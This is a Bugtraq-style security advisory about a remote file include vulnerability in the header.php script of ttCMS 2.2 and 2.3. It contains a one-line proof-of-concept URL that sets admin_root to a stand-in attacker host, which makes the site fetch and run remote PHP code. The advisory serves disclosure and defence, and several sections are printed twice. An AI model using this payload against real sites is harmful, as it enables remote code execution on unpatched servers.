ttCMS Header.PHP Remote File Include Vulnerability
BID:7625
Info
ttCMS Header.PHP Remote File Include Vulnerability
| Bugtraq ID: | 7625 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 17 2003 12:00AM |
| Updated: | May 17 2003 12:00AM |
| Credit: | Discovery of this vulnerability credited to [email protected]. |
| Vulnerable: |
ttCMS ttCMS 2.3 ttCMS ttCMS 2.2 |
| Not Vulnerable: | |
Discussion
ttCMS Header.PHP Remote File Include Vulnerability
A remote file include vulnerability has been reported for ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'header.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL.
A remote file include vulnerability has been reported for ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'header.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL.
Exploit / POC
ttCMS Header.PHP Remote File Include Vulnerability
The following proof of concept was provided:
http://target/admin/templates/header.php?admin_root=http://attacker/
The following proof of concept was provided:
http://target/admin/templates/header.php?admin_root=http://attacker/
Solution / Fix
ttCMS Header.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
ttCMS Header.PHP Remote File Include Vulnerability
References:
References: